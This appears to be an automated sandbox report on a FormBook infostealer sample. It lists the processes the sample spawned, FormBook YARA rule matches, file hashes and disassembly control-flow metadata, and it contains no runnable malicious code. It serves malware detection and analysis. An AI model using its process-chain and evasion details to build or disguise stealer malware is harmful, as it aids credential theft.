                                                          Path:C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe"
                                                          Imagebase:0x6c0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:15
                                                          Start time:16:02:42
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                          Imagebase:0xbf0000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:16:02:43
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                          Imagebase:0x7ff7ca230000
                                                          File size:71'680 bytes
                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:16:02:50
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                          Imagebase:0xbf0000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:16:02:54
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff613480000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:12.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:3
                                                            Total number of Limit Nodes:0
                                                            execution_graph 13849 7ff7c023587a 13850 7ff7c0235889 VirtualProtect 13849->13850 13852 7ff7c0235961 13850->13852

                                                            Executed Functions

                                                            Function 00007FF7C0320000 Relevance: 3.6, Strings: 1, Instructions: 2305COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467458673.00007FF7C0320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0320000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ]
                                                            • API String ID: 0-2000263931
                                                            • Opcode ID: 876ba70657a1d8e6173e9767c836ddb0c1230a7149d149c5df04a7f60a26deff
                                                            • Instruction ID: 98e1b0731346ab0abeaea027ee65d7a4bf7f576d01d6605f1e7a4ec36859dd84
                                                            • Opcode Fuzzy Hash: 876ba70657a1d8e6173e9767c836ddb0c1230a7149d149c5df04a7f60a26deff
                                                            • Instruction Fuzzy Hash: CDF2037180DBC68FD756EB3888556A4BFF0FF56310B5906EEC089CB193DA28784AC791
                                                            Function 00007FF7C0240FF9 Relevance: 1.8, Instructions: 1796COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca4a08af50058be58eb01a1c7b41e8433b9ac1f3e210eabcf99042629313e43b
                                                            • Instruction ID: 459e80fb31e8e52f5f7a65226ff51a6bbad78e34ed5c29f85bfa625e008cd412
                                                            • Opcode Fuzzy Hash: ca4a08af50058be58eb01a1c7b41e8433b9ac1f3e210eabcf99042629313e43b
                                                            • Instruction Fuzzy Hash: 62C2233060CB8A4FE719EF2894815A5BBE2FF95311B4446BED48AC7296DF34F846C781
                                                            Function 00007FF7C02428AF Relevance: 1.6, Instructions: 1580COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3b07d97734e93e2c942e0f4a0591517508a612d89a45c559b4ca4a7800da8b3
                                                            • Instruction ID: 16205334c815e71c2b567d8e01151c47246bf428cce636983d3725b40b35158f
                                                            • Opcode Fuzzy Hash: c3b07d97734e93e2c942e0f4a0591517508a612d89a45c559b4ca4a7800da8b3
                                                            • Instruction Fuzzy Hash: B272463161CA4A4FE359EF2884415B5BBE1FF95321B8046BED48AC7292DF28F846C7D1
                                                            Function 00007FF7C0236C85 Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fish
                                                            • API String ID: 0-1064584243
                                                            • Opcode ID: 471a61617a0a8e808a0cb8d02113ca06ad9ce543e03b5c863c39a91d1cf2818c
                                                            • Instruction ID: b319e26953a2ce326052acc4b40609222de6d61497696d22c9e289e6786d8664
                                                            • Opcode Fuzzy Hash: 471a61617a0a8e808a0cb8d02113ca06ad9ce543e03b5c863c39a91d1cf2818c
                                                            • Instruction Fuzzy Hash: 0891363061CA494FD75CAF28D4595B9B7E9FF59320B40467EE48BC3292DE28F81687C1
                                                            Function 00007FF7C023E591 Relevance: 1.2, Instructions: 1239COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1500 7ff7c023e591-7ff7c023e5cb 1501 7ff7c023e65c-7ff7c023e66f 1500->1501 1502 7ff7c023e5d1-7ff7c023e616 call 7ff7c023d270 call 7ff7c0239730 1500->1502 1507 7ff7c023e6b1-7ff7c023e6b4 1501->1507 1508 7ff7c023e671-7ff7c023e689 1501->1508 1502->1501 1514 7ff7c023e618-7ff7c023e636 1502->1514 1512 7ff7c023e756-7ff7c023e767 1507->1512 1513 7ff7c023e6b5-7ff7c023e6d1 1507->1513 1510 7ff7c023e68b-7ff7c023e6af 1508->1510 1511 7ff7c023e6d3-7ff7c023e6ea call 7ff7c0239730 call 7ff7c023a2a0 1508->1511 1510->1507 1511->1512 1527 7ff7c023e6ec-7ff7c023e6fe 1511->1527 1519 7ff7c023e7a9-7ff7c023e7ac 1512->1519 1520 7ff7c023e769-7ff7c023e779 1512->1520 1513->1511 1514->1501 1516 7ff7c023e638-7ff7c023e65b 1514->1516 1523 7ff7c023e7ae-7ff7c023e7b5 1519->1523 1524 7ff7c023e7b6 1519->1524 1525 7ff7c023e77a 1520->1525 1523->1524 1528 7ff7c023e7b7-7ff7c023e7c1 1524->1528 1529 7ff7c023e853-7ff7c023e861 1524->1529 1526 7ff7c023e77b-7ff7c023e789 1525->1526 1530 7ff7c023e78b-7ff7c023e78e 1526->1530 1531 7ff7c023e7d3-7ff7c023e7f5 call 7ff7c023d270 1526->1531 1527->1525 1536 7ff7c023e700 1527->1536 1533 7ff7c023e7c7-7ff7c023e7d1 1528->1533 1534 7ff7c023e7c3-7ff7c023e7c4 1528->1534 1541 7ff7c023e866-7ff7c023e867 1529->1541 1542 7ff7c023e863-7ff7c023e865 1529->1542 1535 7ff7c023e792-7ff7c023e7a8 1530->1535 1531->1529 1547 7ff7c023e7f7-7ff7c023e809 1531->1547 1533->1531 1534->1533 1535->1519 1539 7ff7c023e702-7ff7c023e70a 1536->1539 1540 7ff7c023e746-7ff7c023e755 1536->1540 1539->1526 1544 7ff7c023e70c-7ff7c023e711 1539->1544 1545 7ff7c023e8a9-7ff7c023e8ac 1541->1545 1546 7ff7c023e869-7ff7c023e884 1541->1546 1542->1541 1544->1535 1548 7ff7c023e713-7ff7c023e734 call 7ff7c0239ad0 1544->1548 1550 7ff7c023e8ae-7ff7c023e8b5 1545->1550 1551 7ff7c023e8b6 1545->1551 1549 7ff7c023e885-7ff7c023e889 1546->1549 1547->1549 1556 7ff7c023e80b 1547->1556 1548->1512 1566 7ff7c023e736-7ff7c023e744 1548->1566 1554 7ff7c023e88b-7ff7c023e8a8 1549->1554 1555 7ff7c023e8d3-7ff7c023e913 call 7ff7c023d270 * 2 call 7ff7c0239730 1549->1555 1550->1551 1557 7ff7c023e8b7-7ff7c023e8d0 1551->1557 1558 7ff7c023e9ac-7ff7c023e9bf 1551->1558 1554->1545 1555->1558 1585 7ff7c023e919-7ff7c023e94c 1555->1585 1561 7ff7c023e80d-7ff7c023e82b call 7ff7c0239ad0 1556->1561 1562 7ff7c023e851-7ff7c023e852 1556->1562 1557->1555 1568 7ff7c023ea01 1558->1568 1569 7ff7c023e9c1-7ff7c023e9d6 1558->1569 1561->1529 1571 7ff7c023e82d-7ff7c023e850 1561->1571 1566->1540 1575 7ff7c023ea02-7ff7c023ea09 1568->1575 1572 7ff7c023e9d8 1569->1572 1573 7ff7c023ea0b-7ff7c023ea0e 1569->1573 1571->1562 1576 7ff7c023e9db-7ff7c023e9ee 1572->1576 1578 7ff7c023ea22-7ff7c023ea2e 1573->1578 1579 7ff7c023ea10-7ff7c023ea20 1573->1579 1575->1573 1576->1575 1580 7ff7c023e9f0-7ff7c023e9f1 1576->1580 1582 7ff7c023ea3e-7ff7c023ea47 1578->1582 1583 7ff7c023ea30-7ff7c023ea3b 1578->1583 1579->1582 1584 7ff7c023e9f2-7ff7c023ea00 1580->1584 1586 7ff7c023ea49-7ff7c023ea4b 1582->1586 1587 7ff7c023eab8-7ff7c023eac5 1582->1587 1583->1582 1584->1582 1589 7ff7c023e94e-7ff7c023e96a 1585->1589 1590 7ff7c023e995-7ff7c023e99e 1585->1590 1588 7ff7c023eac7-7ff7c023eb13 call 7ff7c023d270 * 2 call 7ff7c0239730 1586->1588 1591 7ff7c023ea4d 1586->1591 1587->1588 1598 7ff7c023ec19-7ff7c023ec4a 1588->1598 1610 7ff7c023eb19-7ff7c023eb34 1588->1610 1589->1576 1595 7ff7c023e96c-7ff7c023e971 1589->1595 1596 7ff7c023e9a0-7ff7c023e9ab 1590->1596 1592 7ff7c023ea4f-7ff7c023ea67 call 7ff7c0239ad0 1591->1592 1593 7ff7c023ea93-7ff7c023eab7 1591->1593 1593->1587 1593->1598 1595->1584 1600 7ff7c023e973-7ff7c023e993 1595->1600 1614 7ff7c023ec4c-7ff7c023ec77 1598->1614 1615 7ff7c023ec94-7ff7c023ecd6 call 7ff7c023d270 * 2 call 7ff7c0239730 1598->1615 1600->1596 1612 7ff7c023eb8d-7ff7c023eb96 1610->1612 1613 7ff7c023eb36-7ff7c023eb39 1610->1613 1612->1598 1616 7ff7c023eb9c-7ff7c023ebb9 1612->1616 1617 7ff7c023ebba-7ff7c023ebcb 1613->1617 1618 7ff7c023eb3b-7ff7c023eb5b 1613->1618 1619 7ff7c023ee0e-7ff7c023ee63 1614->1619 1620 7ff7c023ec7d-7ff7c023ec93 1614->1620 1615->1619 1642 7ff7c023ecdc-7ff7c023ecfa 1615->1642 1616->1617 1622 7ff7c023ebcc-7ff7c023ebe0 call 7ff7c023e040 1617->1622 1618->1622 1623 7ff7c023eb5d-7ff7c023eb62 1618->1623 1636 7ff7c023ee69-7ff7c023eebe call 7ff7c023d270 * 2 call 7ff7c0239730 1619->1636 1637 7ff7c023ef36-7ff7c023ef41 1619->1637 1620->1615 1625 7ff7c023ebe3-7ff7c023ebef 1622->1625 1624 7ff7c023eb64-7ff7c023eb88 call 7ff7c0239ad0 1623->1624 1623->1625 1624->1612 1625->1598 1631 7ff7c023ebf1-7ff7c023ec18 1625->1631 1636->1637 1671 7ff7c023eec0-7ff7c023eeeb 1636->1671 1646 7ff7c023ef46-7ff7c023ef47 1637->1646 1647 7ff7c023ef43-7ff7c023ef45 1637->1647 1642->1619 1645 7ff7c023ed00-7ff7c023ed1a 1642->1645 1651 7ff7c023ed1c-7ff7c023ed1f 1645->1651 1652 7ff7c023ed73 1645->1652 1648 7ff7c023ef89-7ff7c023ef8b 1646->1648 1649 7ff7c023ef49-7ff7c023ef88 1646->1649 1647->1646 1653 7ff7c023ef91-7ff7c023efd1 call 7ff7c023d270 call 7ff7c0239730 1648->1653 1654 7ff7c023f015-7ff7c023f027 1648->1654 1649->1648 1658 7ff7c023ed21-7ff7c023ed3a 1651->1658 1659 7ff7c023eda0-7ff7c023ede2 call 7ff7c023e040 1651->1659 1655 7ff7c023ed75-7ff7c023ed7a 1652->1655 1656 7ff7c023ede4 1652->1656 1653->1654 1682 7ff7c023efd3-7ff7c023f014 call 7ff7c023ad98 1653->1682 1678 7ff7c023f069 1654->1678 1679 7ff7c023f029-7ff7c023f067 1654->1679 1661 7ff7c023ed7c-7ff7c023ed9b call 7ff7c0239ad0 1655->1661 1662 7ff7c023edfb-7ff7c023ee0d 1655->1662 1656->1619 1665 7ff7c023ede6-7ff7c023edf9 1656->1665 1666 7ff7c023ed3c-7ff7c023ed53 1658->1666 1667 7ff7c023ed55-7ff7c023ed67 1658->1667 1659->1656 1661->1659 1665->1662 1668 7ff7c023ed6b-7ff7c023ed71 1666->1668 1667->1668 1668->1652 1676 7ff7c023ef2a-7ff7c023ef35 1671->1676 1677 7ff7c023eeed-7ff7c023eeff 1671->1677 1677->1637 1681 7ff7c023ef01-7ff7c023ef27 1677->1681 1679->1678 1681->1676
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f7a30e286bc747b795cc04d6e5b0f3ba22fa5e961c89d2ae46030a58ee8950f
                                                            • Instruction ID: c7a055a7e74b29cd3d7588854a578fc6a2167dc320638998cec1d5738be59301
                                                            • Opcode Fuzzy Hash: 3f7a30e286bc747b795cc04d6e5b0f3ba22fa5e961c89d2ae46030a58ee8950f
                                                            • Instruction Fuzzy Hash: A582323051CB4A4FE719EF28C4844A1BBE1FF85315B5446BED48AC72A6DB38F84AC791
                                                            Function 00007FF7C0236AC0 Relevance: 1.2, Instructions: 1171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 729927593d10083645932ac25ed6d3ac7288dfb0756a0f3050b9c0e38eebbdd2
                                                            • Instruction ID: 891bfa5656aec6a42307a34804bd08086d35845dd168ce2633d2ca5b05dcf9a7
                                                            • Opcode Fuzzy Hash: 729927593d10083645932ac25ed6d3ac7288dfb0756a0f3050b9c0e38eebbdd2
                                                            • Instruction Fuzzy Hash: A082253190CA864BEB599F6484412B5BFE1EF55320F9441BED48ECB6D3DB28B846C7E0
                                                            Function 00007FF7C023B708 Relevance: .9, Instructions: 919COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1961 7ff7c023b708-7ff7c023f9c5 1963 7ff7c023f9c7-7ff7c023fa0e 1961->1963 1964 7ff7c023fa0f-7ff7c023fa39 1961->1964 1963->1964 1966 7ff7c023fa3b-7ff7c023fa50 1964->1966 1967 7ff7c023fa52 1964->1967 1969 7ff7c023fa54-7ff7c023fa59 1966->1969 1967->1969 1971 7ff7c023fa5f-7ff7c023fa6e 1969->1971 1972 7ff7c023fb56-7ff7c023fb76 1969->1972 1976 7ff7c023fa78-7ff7c023fa79 1971->1976 1977 7ff7c023fa70-7ff7c023fa76 1971->1977 1974 7ff7c023fbc7-7ff7c023fbd2 1972->1974 1978 7ff7c023fb78-7ff7c023fb7e 1974->1978 1979 7ff7c023fbd4-7ff7c023fbe3 1974->1979 1982 7ff7c023fa7b-7ff7c023fa9e 1976->1982 1977->1982 1980 7ff7c0240042-7ff7c024005a 1978->1980 1981 7ff7c023fb84-7ff7c023fba5 call 7ff7c023b6e8 1978->1981 1987 7ff7c023fbf9 1979->1987 1988 7ff7c023fbe5-7ff7c023fbf7 1979->1988 1991 7ff7c024005c-7ff7c0240097 call 7ff7c023b680 1980->1991 1992 7ff7c02400a4-7ff7c02400b9 call 7ff7c0236ab8 1980->1992 1998 7ff7c023fbaa-7ff7c023fbc4 1981->1998 1986 7ff7c023faf3-7ff7c023fafe 1982->1986 1994 7ff7c023faa0-7ff7c023faa6 1986->1994 1995 7ff7c023fb00-7ff7c023fb17 1986->1995 1990 7ff7c023fbfb-7ff7c023fc00 1987->1990 1988->1990 1996 7ff7c023fc8c-7ff7c023fca0 1990->1996 1997 7ff7c023fc06-7ff7c023fc28 call 7ff7c023b6e8 1990->1997 2039 7ff7c0240099-7ff7c02400a2 1991->2039 2040 7ff7c02400e1-7ff7c02400eb 1991->2040 2019 7ff7c02400be-7ff7c02400d1 1992->2019 1994->1980 1999 7ff7c023faac-7ff7c023faf0 call 7ff7c023b6e8 1994->1999 2012 7ff7c023fb19-7ff7c023fb3f call 7ff7c023b6e8 1995->2012 2013 7ff7c023fb46-7ff7c023fb51 call 7ff7c023ae50 1995->2013 2001 7ff7c023fca2-7ff7c023fca8 1996->2001 2002 7ff7c023fcf0-7ff7c023fcff 1996->2002 2030 7ff7c023fc2a-7ff7c023fc54 1997->2030 2031 7ff7c023fc56-7ff7c023fc57 1997->2031 1998->1974 1999->1986 2008 7ff7c023fcaa-7ff7c023fcc5 2001->2008 2009 7ff7c023fcc7-7ff7c023fcdf 2001->2009 2026 7ff7c023fd0c 2002->2026 2027 7ff7c023fd01-7ff7c023fd0a 2002->2027 2008->2009 2021 7ff7c023fce8-7ff7c023fceb 2009->2021 2012->2013 2013->1996 2044 7ff7c02400dc-7ff7c02400df 2019->2044 2045 7ff7c02400d3-7ff7c02400db 2019->2045 2028 7ff7c023fe98-7ff7c023fef4 2021->2028 2034 7ff7c023fd0e-7ff7c023fd13 2026->2034 2027->2034 2080 7ff7c023fef6-7ff7c023ff4d call 7ff7c02369f0 2028->2080 2081 7ff7c023ff64-7ff7c023ff78 2028->2081 2041 7ff7c023fc59-7ff7c023fc60 2030->2041 2031->2041 2042 7ff7c023fd19-7ff7c023fd1c 2034->2042 2043 7ff7c024001f-7ff7c0240020 2034->2043 2039->1992 2048 7ff7c02400ed-7ff7c02400f5 2040->2048 2049 7ff7c02400f6-7ff7c0240107 2040->2049 2041->1996 2053 7ff7c023fc62-7ff7c023fc87 call 7ff7c023b710 2041->2053 2046 7ff7c023fd1e-7ff7c023fd3b call 7ff7c0230238 2042->2046 2047 7ff7c023fd64-7ff7c023fd6b 2042->2047 2051 7ff7c0240023-7ff7c0240032 2043->2051 2044->2040 2045->2044 2046->2047 2079 7ff7c023fd3d-7ff7c023fd61 2046->2079 2058 7ff7c023fe6c-7ff7c023fe8f 2047->2058 2059 7ff7c023fd71-7ff7c023fd7d 2047->2059 2048->2049 2055 7ff7c0240109-7ff7c0240111 2049->2055 2056 7ff7c0240112-7ff7c024015f call 7ff7c023d270 2049->2056 2064 7ff7c0240033-7ff7c024003b 2051->2064 2053->1996 2068 7ff7c024000e-7ff7c024001e 2053->2068 2055->2056 2088 7ff7c0240171 2056->2088 2089 7ff7c0240161-7ff7c024016f 2056->2089 2069 7ff7c023fe95-7ff7c023fe96 2058->2069 2059->1980 2065 7ff7c023fd83-7ff7c023fd92 2059->2065 2064->1980 2072 7ff7c023fda5-7ff7c023fdb2 call 7ff7c0230238 2065->2072 2073 7ff7c023fd94-7ff7c023fda3 2065->2073 2069->2028 2084 7ff7c023fdb8-7ff7c023fdbe 2072->2084 2073->2084 2079->2047 2122 7ff7c023ffbe-7ff7c023ffc3 2080->2122 2123 7ff7c023ff4f-7ff7c023ff53 2080->2123 2085 7ff7c023ff7a-7ff7c023ffa5 call 7ff7c02369f0 2081->2085 2086 7ff7c023ffc7-7ff7c023ffd3 call 7ff7c0239730 2081->2086 2091 7ff7c023fdc0-7ff7c023fded 2084->2091 2092 7ff7c023fdf3-7ff7c023fdf8 2084->2092 2112 7ff7c023ffaa-7ff7c023ffb2 2085->2112 2095 7ff7c023ffd4-7ff7c023ffec 2086->2095 2094 7ff7c0240173-7ff7c0240178 2088->2094 2089->2094 2091->2092 2092->1980 2097 7ff7c023fdfe-7ff7c023fe1e 2092->2097 2100 7ff7c024017a-7ff7c024018d call 7ff7c0235ae0 2094->2100 2101 7ff7c024018f-7ff7c0240195 2094->2101 2095->1980 2102 7ff7c023ffee-7ff7c023fffe 2095->2102 2110 7ff7c023fe32-7ff7c023fe41 2097->2110 2111 7ff7c023fe20-7ff7c023fe2e 2097->2111 2106 7ff7c024019c-7ff7c02401a3 2100->2106 2101->2106 2107 7ff7c0240197 call 7ff7c0236a08 2101->2107 2108 7ff7c0240000-7ff7c024000b 2102->2108 2107->2106 2108->2068 2117 7ff7c023fe44-7ff7c023fe62 call 7ff7c023b618 2110->2117 2111->2117 2119 7ff7c023fe30-7ff7c023fe31 2111->2119 2112->2051 2116 7ff7c023ffb4-7ff7c023ffb7 2112->2116 2116->2064 2120 7ff7c023ffb9 2116->2120 2128 7ff7c023fe67-7ff7c023fe6a 2117->2128 2119->2110 2120->2108 2124 7ff7c023ffbb 2120->2124 2122->2086 2123->2095 2127 7ff7c023ff55-7ff7c023ff5f 2123->2127 2124->2122 2128->2028
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ea92237e41b2f43c2bcc0302d25289166351fb79f8d174770b57417575c1665
                                                            • Instruction ID: 05bd41d511bfd164a979778ce560ce389f23c8745258d13d2db4a55bfac17dbe
                                                            • Opcode Fuzzy Hash: 9ea92237e41b2f43c2bcc0302d25289166351fb79f8d174770b57417575c1665
                                                            • Instruction Fuzzy Hash: 2752F930A08A194FDBA8EF28D495A79BBE1FF59311B5401BDD44EC7292DF24FC428B91
                                                            Function 00007FF7C023E109 Relevance: .5, Instructions: 493COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2270 7ff7c023e109-7ff7c023e129 2271 7ff7c023e12b-7ff7c023e154 2270->2271 2272 7ff7c023e173-7ff7c023e18a call 7ff7c0239730 call 7ff7c023a2a0 2270->2272 2273 7ff7c023e21a 2271->2273 2274 7ff7c023e15a-7ff7c023e171 2271->2274 2272->2273 2284 7ff7c023e190-7ff7c023e19e 2272->2284 2278 7ff7c023e21e-7ff7c023e22b 2273->2278 2274->2272 2280 7ff7c023e26d-7ff7c023e270 2278->2280 2281 7ff7c023e22d-7ff7c023e23d 2278->2281 2282 7ff7c023e27a-7ff7c023e295 2280->2282 2283 7ff7c023e272-7ff7c023e279 2280->2283 2285 7ff7c023e23f-7ff7c023e24c 2281->2285 2286 7ff7c023e296-7ff7c023e2d3 call 7ff7c023d270 * 2 call 7ff7c0239730 2282->2286 2283->2282 2294 7ff7c023e4ac-7ff7c023e4bf 2283->2294 2287 7ff7c023e1a0-7ff7c023e1a2 2284->2287 2288 7ff7c023e20f-7ff7c023e219 2284->2288 2285->2286 2289 7ff7c023e24e-7ff7c023e255 2285->2289 2286->2294 2316 7ff7c023e2d9-7ff7c023e2f4 2286->2316 2287->2278 2292 7ff7c023e1a4 2287->2292 2293 7ff7c023e256-7ff7c023e26c 2289->2293 2296 7ff7c023e1ea-7ff7c023e1f8 2292->2296 2297 7ff7c023e1a6-7ff7c023e1af 2292->2297 2293->2280 2306 7ff7c023e501-7ff7c023e50c 2294->2306 2307 7ff7c023e4c1-7ff7c023e4eb 2294->2307 2296->2273 2298 7ff7c023e1fa-7ff7c023e206 2296->2298 2300 7ff7c023e208-7ff7c023e20e 2297->2300 2301 7ff7c023e1b1-7ff7c023e1ce 2297->2301 2298->2300 2300->2288 2301->2285 2305 7ff7c023e1d0-7ff7c023e1d5 2301->2305 2305->2293 2309 7ff7c023e1d7-7ff7c023e1e9 call 7ff7c0239ad0 2305->2309 2313 7ff7c023e50e-7ff7c023e51a 2306->2313 2314 7ff7c023e51d-7ff7c023e53c 2306->2314 2310 7ff7c023e4f9-7ff7c023e4ff 2307->2310 2311 7ff7c023e4ed-7ff7c023e4f6 2307->2311 2309->2296 2310->2306 2311->2310 2313->2314 2317 7ff7c023e53e-7ff7c023e54a 2314->2317 2318 7ff7c023e54d-7ff7c023e566 2314->2318 2322 7ff7c023e34d-7ff7c023e357 2316->2322 2323 7ff7c023e2f6-7ff7c023e2f9 2316->2323 2317->2318 2319 7ff7c023e568-7ff7c023e573 2318->2319 2320 7ff7c023e576-7ff7c023e58b 2318->2320 2319->2320 2324 7ff7c023e3cf-7ff7c023e3d7 2322->2324 2325 7ff7c023e37a-7ff7c023e388 2323->2325 2326 7ff7c023e2fb-7ff7c023e31b 2323->2326 2327 7ff7c023e3d9-7ff7c023e3de 2324->2327 2328 7ff7c023e448-7ff7c023e45b 2324->2328 2332 7ff7c023e3b6-7ff7c023e3cb 2325->2332 2329 7ff7c023e359-7ff7c023e378 2326->2329 2330 7ff7c023e31d-7ff7c023e34c 2326->2330 2331 7ff7c023e45f-7ff7c023e46b call 7ff7c02368a8 2327->2331 2333 7ff7c023e3e0-7ff7c023e424 call 7ff7c0239ad0 2327->2333 2328->2331 2329->2325 2329->2332 2330->2322 2336 7ff7c023e470-7ff7c023e480 2331->2336 2332->2324 2333->2294 2338 7ff7c023e42a-7ff7c023e447 2333->2338 2336->2294 2339 7ff7c023e482-7ff7c023e4ab 2336->2339 2338->2328
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02dd942d07857f7321a1b0b1b88c586758c5960debf9376af1839063a8e10805
                                                            • Instruction ID: 7b3600c576052c73573b8d78eafad7a1d8821ddb7ceff8fb583abf9a0b3f5f59
                                                            • Opcode Fuzzy Hash: 02dd942d07857f7321a1b0b1b88c586758c5960debf9376af1839063a8e10805
                                                            • Instruction Fuzzy Hash: 87E1773050CB464FE719DB2884951B1BBE2FF95321B5486BED4CAC72E6DA28F846C7D0
                                                            Function 00007FF7C02471FB Relevance: .2, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
